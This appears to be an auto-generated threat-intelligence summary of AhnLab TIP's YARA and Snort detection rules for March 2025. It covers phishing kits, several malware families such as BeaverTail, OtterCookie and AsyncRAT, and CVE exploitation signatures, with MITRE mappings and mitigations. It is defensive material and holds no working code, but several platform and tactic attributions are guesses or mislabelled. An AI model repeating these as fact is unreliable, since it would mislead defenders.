Full Report
The following is the information on Yara and Snort rules (week 2, March 2025) collected and shared by the AhnLab TIP service. 5 YARA Rules Detection name Description Source PK_Generic_RD127 Phishing Kit – RD127 – Generic email credentials stealer https://github.com/t4d/PhishingKit-Yara-Rules PK_LIDL_ninja Phishing Kit impersonating LIDL https://github.com/t4d/PhishingKit-Yara-Rules PK_MTBank_yochi2 Phishing Kit impersonating M&T Bank https://github.com/t4d/PhishingKit-Yara-Rules PK_SpareBank_perso Phishing […]
Analysis Summary
The provided context is a list of detection rules (YARA and Snort) published by AhnLab TIP for the second week of March 2025. This information focuses on indicators of compromise and detection logic rather than specific, newly discovered malware families or threat actor TTPs in depth, although several known malware families are referenced in the Snort rules.
Here is the summary structured according to your template:
# Tool/Technique: Phishing Kits (YARA Signatures)
## Overview
A collection of YARA rules designed to detect specific known or custom phishing kits likely deployed to harvest credentials, impersonating various legitimate entities.
## Technical Details
- Type: Tool/Malware Class (Phishing Kits)
- Platform: Web Servers (PHP/HTML/Scripts commonly associated with web phishing)
- Capabilities: Credential harvesting, brand impersonation.
- First Seen: Varies based on the underlying kit, detection rules are recent (March 2025).
## MITRE ATT&CK Mapping
These kits primarily align with techniques related to initial access via deception and credential compromise:
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (If delivered via email)
- T1566.002 - Spearphishing Link (Most common delivery method for phishing kits)
## Functionality
### Core Capabilities
- **Credential Stealing:** Specifically designed to capture user input, like the generic 'PK\_Generic\_RD127' rule suggests (credentials stealer).
- **Brand Impersonation:** Kits are configured to mimic legitimate organizations (LIDL, M&T Bank, SpareBank1, Trust Wallet) to trick victims.
### Advanced Features
- Not explicitly detailed in the summary, but phishing kits generally maintain backend functionality to store or relay stolen credentials.
## Indicators of Compromise
*Note: As these are detection rules, specific IoCs are embedded within the rules themselves, not explicitly listed here.*
- File Hashes: N/A (References YARA rules)
- File Names: N/A (Rules target content/structure)
- Registry Keys: N/A
- Network Indicators: N/A (Rules target web content/structure)
- Behavioral Indicators: Detection based on patterns characteristic of known phishing kit code structures.
## Associated Threat Actors
The specific actors using these exact kits are not named, but the general activity is associated with cybercriminals engaged in financial fraud or digital identity theft.
## Detection Methods
- **Signature-based detection:** Provided via 5 specific YARA rules:
- `PK_Generic_RD127`
- `PK_LIDL_ninja`
- `PK_MTBank_yochi2`
- `PK_SpareBank_perso`
- `PK_TrustWallet_next`
- **Behavioral detection:** N/A (YARA focuses on static content)
- **YARA rules:** Specific rules mentioned above available via the linked source.
## Mitigation Strategies
- **Prevention measures:** Email filtering, user security awareness training regarding suspicious links and login pages.
- **Hardening recommendations:** Web application security scanning to detect unauthorized scripts or code associated with common phishing templates.
## Related Tools/Techniques
- Other web-based credential harvesting scripts or front-end web application attacks.
***
# Tool/Technique: BeaverTail Malware
## Overview
BeaverTail is a Trojan/Backdoor family indicated by Snort rules monitoring Command and Control (CnC) communication utilizing HTTP POST methods.
## Technical Details
- Type: Malware (Trojan/Backdoor)
- Platform: Implied Windows/General (Based on common RAT/Trojan deployment, though not explicit)
- Capabilities: Establishing connection back to CnC server, likely for remote control and data exfiltration.
- First Seen: Not specified in context, but rules are dated March 2025 update.
## MITRE ATT&CK Mapping
Based on CnC activity observed:
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP/HTTPS)
## Functionality
### Core Capabilities
- **CnC Communication:** Sending data or receiving commands via HTTP POST requests identified by specific Snort rule patterns (`ET TROJAN BeaverTail CnC Activity (POST) M1`, `M2`).
### Advanced Features
- None explicitly detailed, standard backdoor functionality implied.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic matching BeaverTail CnC patterns observed via POST requests.
- Behavioral Indicators: Specific network patterns associated with BeaverTail CnC callbacks.
## Associated Threat Actors
Not specified in the context list.
## Detection Methods
- **Signature-based detection:** Snort rules `ET TROJAN BeaverTail CnC Activity (POST) M1` and `ET TROJAN BeaverTail CnC Activity (POST) M2`.
- **Behavioral detection:** Monitoring for anomalous HTTP POST traffic patterns matching known signature metadata.
- **YARA rules:** N/A
## Mitigation Strategies
- **Prevention measures:** Strict egress firewall policies limiting outbound connections to unknown destinations.
- **Hardening recommendations:** Network monitoring for protocol anomalies on standard ports.
## Related Tools/Techniques
- Other web-based Trojans utilizing HTTP for C2 infrastructure.
***
# Tool/Technique: InvisibleFerret Malware
## Overview
InvisibleFerret is a Trojan/Backdoor family detected via Snort rules monitoring its Command and Control (CnC) activity using both GET and POST HTTP methods.
## Technical Details
- Type: Malware (Trojan/Backdoor)
- Platform: Implied Windows (Based on other related malware, but not explicit)
- Capabilities: Persistent communication with CnC infrastructure, suggesting remote access or staging.
- First Seen: Not specified in context, but rules are dated March 2025 update.
## MITRE ATT&CK Mapping
Based on CnC activity observed:
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP/HTTPS)
## Functionality
### Core Capabilities
- **CnC Communication:** Both GET and POST requests are used for C2 interactions, indicated by multiple rule variants (`M1`, `M4`, `M5`, `M6`).
### Advanced Features
- Versatile communication methods (GET/POST) suggest adaptability in probing network defenses.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic matching InvisibleFerret GET and POST C2 activity.
- Behavioral Indicators: Specific network request characteristics.
## Associated Threat Actors
Not specified in the context list.
## Detection Methods
- **Signature-based detection:** Multiple Snort rules: `ET TROJAN InvisibleFerret CnC Activity (GET) M4/M5/M6` and `ET TROJAN InvisibleFerret CnC Activity (POST) M1`.
- **Behavioral detection:** Monitoring for sequential or recurring C2 patterns involving both HTTP methods.
- **YARA rules:** N/A
## Mitigation Strategies
- **Prevention measures:** Utilize web proxies/proxies with deep packet inspection capabilities.
- **Hardening recommendations:** Deploy IDS/IPS systems configured to recognize detailed C2 traffic signatures.
## Related Tools/Techniques
- Other malware utilizing hybrid HTTP methods for C2 communications.
***
# Tool/Technique: OtterCookie Malware
## Overview
OtterCookie is a modular Trojan family detected through specific network indicators related to command execution, data exfiltration, and payload requests.
## Technical Details
- Type: Malware (Trojan/Backdoor)
- Platform: Not specified.
- Capabilities: File exfiltration, command execution confirmation, receiving payloads, and basic check-ins.
- First Seen: Not specified in context, but rules are dated March 2025 update.
## MITRE ATT&CK Mapping
Covers multiple stages of compromise:
- **TA0008 - Lateral Movement** (Potential, depending on reach)
- **TA0009 - Collection**
- T1005 - Data from Local System (Implied by 'File Exfiltration')
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel (Implied by 'File Exfiltration')
## Functionality
### Core Capabilities
- **File Exfiltration:** Sending collected data back to the attacker.
- **Command and Response:** Confirmation of victim command execution.
- **Payload Distribution:** Requesting and downloading additional components (`Payload Request`).
### Advanced Features
- Specific communication tokens or paths mentioned in rules, like the use of 'whour' in the inbound command rule.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific traffic patterns related to "Host Profile Exfil," unusual POST/GET requests tied to commands/payloads regarding OtterCookie.
- Behavioral Indicators: Sequences of C2 interactions indicating command execution confirmation (`Victim Command Execution Confirmation To CnC Server`).
## Associated Threat Actors
Not specified in the context list.
## Detection Methods
- **Signature-based detection:** Several Snort rules covering various communications: `Host Profile Exfil`, `CnC Command Inbound (whour)`, `File Exfiltration`, `Victim Command Execution Confirmation To CnC Server`, and `Payload Request`.
- **Behavioral detection:** Detecting the sequence of C2 activities characteristic of OtterCookie operation.
- **YARA rules:** N/A
## Mitigation Strategies
- **Prevention measures:** File integrity monitoring if the malware drops specific named components.
- **Hardening recommendations:** Blocking outbound traffic to potentially malicious communication endpoints discovered via threat intelligence feeds.
## Related Tools/Techniques
- Other modular Trojans utilizing HTTP for multi-stage operations.
***
# Tool/Technique: AsyncRAT Malware
## Overview
AsyncRAT is a Remote Access Trojan (RAT) family detected by network signatures indicating initial contact (checkin) and requests for new installation payloads.
## Technical Details
- Type: Malware (RAT)
- Platform: Implied Windows (Common target for AsyncRAT).
- Capabilities: Remote administration, code execution, and potentially malware distribution.
- First Seen: Not specified in context, rules are recent updates.
## MITRE ATT&CK Mapping
- **TA0007 - Credential Access** (If used for credential harvesting)
- **TA0011 - Command and Control**
- T1071.001 - Web Protocols
## Functionality
### Core Capabilities
- **Victim Checkin:** Establishing initial contact with the C2 server.
- **Installer Request:** Requesting a secondary or new installation payload (`Installer Payload Request`).
### Advanced Features
- As a RAT, it provides remote control capabilities.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific HTTP GET/POST requests recognized as AsyncRAT check-in or payload requests.
- Behavioral Indicators: The characteristic traffic patterns associated with AsyncRAT initialization.
## Associated Threat Actors
Not specified in the context list.
## Detection Methods
- **Signature-based detection:** Snort rules `AsyncRAT Installer Payload Request` and `AsyncRAT Victim Checkin`.
- **Behavioral detection:** Monitoring for traffic patterns indicative of RAT initial setup.
- **YARA rules:** N/A
## Mitigation Strategies
- **Prevention measures:** Strict outbound network access controls; behavioral monitoring on endpoints to detect RAT processes attempting to make persistent network connections.
- **Hardening recommendations:** Review system event logs for suspicious PowerShell activity, as the GhostWeaver rule suggests PowerShell involvement in downloading.
## Related Tools/Techniques
- Gh0st RAT, DarkComet, or other mainstream remote access tools.
***
# Tool/Technique: GhostWeaver Backdoor (Contextual to Win32/SocGholish)
## Overview
This entry points to a detection linking the Win32/SocGholish detection category with GhostWeaver backdoor activity, specifically observing a PowerShell request related to BOINC downloads.
## Technical Details
- Type: Backdoor/Malware Association (Win32/SocGholish linkage)
- Platform: Windows (Implied by Win32 and PowerShell usage)
- Capabilities: File download/execution via PowerShell, potentially related to botnet enrollment (BOINC referenced).
- First Seen: Not specified.
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- **TA0005 - Defense Evasion** (If execution cloaks payloads)
## Functionality
### Core Capabilities
- **PowerShell Execution:** Initiating remote commands via PowerShell.
- **External Download:** Attempting to download resources associated with BOINC (a distributed computing platform, sometimes misused by threat actors).
### Advanced Features
- Use of common system tools (PowerShell) for stealthy execution.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific POST requests tied to this detection signature.
- Behavioral Indicators: PowerShell execution involving remote URLs associated with this detection category.
## Associated Threat Actors
Not specified, but SocGholish is often associated with initial access or loader activity.
## Detection Methods
- **Signature-based detection:** Snort rule `ET TROJAN Win32/SocGholish GhostWeaver Backdoor Activity (PowerShell BOINC Download Request)`.
- **Behavioral detection:** Script block logging and analysis of potentially malicious PowerShell commands.
- **YARA rules:** N/A
## Mitigation Strategies
- **Prevention measures:** Application whitelisting, disabling PowerShell remote execution where unnecessary.
- **Hardening recommendations:** Enforce robust PowerShell logging and monitoring to track remote file execution.
## Related Tools/Techniques
- Other fileless malware or loaders utilizing PowerShell for downloading secondary stages.
***
*(The remaining Snort rules reference specific CVE exploitation attempts or generic attack responses, detailed below)*
# Tool/Technique: CVE Exploitation Attempts & Generic Attack Responses
## Overview
A set of Snort rules that indicate active exploitation attempts against known vulnerabilities or post-exploitation responses.
## Technical Details
- Type: Technique/Vulnerability Activity
- Platform: Varies (Web Apps, Cisco devices, etc.)
- Capabilities: Probing for known weaknesses or responding to attack patterns.
- First Seen: Depends on the original disclosure dates of the CVEs, but rule updates are recent (March 2025).
## MITRE ATT&CK Mapping
Varies widely based on the specific rule (E.g., T1190 for Exploitation, T1070 for Defense Evasion).
## Functionality
### Core Capabilities
- **Exploitation Attempts:** Targeting specific, known vulnerabilities (Naviko, Jenkins) for unauthorized access or RCE.
- **Attack Response/Cleanup:** Rules monitor traffic related to known attack frameworks or responses (e.g., ClickFix rules monitoring command inbound/logging).
### Advanced Features
- Detection focuses on the specific HTTP requests or payloads known to trigger these vulnerabilities.
## Indicators of Compromise
- Network Indicators: Traffic matching the signature profiles for the referenced CVEs or activity associated with ClickFix/MSHTA command patterns.
## Associated Threat Actors
Not specified.
## Detection Methods
- **Signature-based detection:** Numerous specific Snort Rules (e.g., targeting CVE-2024-48248, CVE-2018-1000861, CVE-2020-3259, CVE-2022-43769).
- **Attack/Response Detection:** Rules for `ET ATTACK_RESPONSE ClickFix` indicate monitoring traffic patterns associated with specific post-exploitation tooling or frameworks.
## Mitigation Strategies
- **Prevention measures:** Patching systems immediately upon disclosure of critical CVEs (Naviko, Jenkins, Hitachi Vantara).
- **Hardening recommendations:** Segmenting vulnerable services; least-privilege enforcement.
## Related Tools/Techniques
- Specific exploit modules targeting the listed CVEs.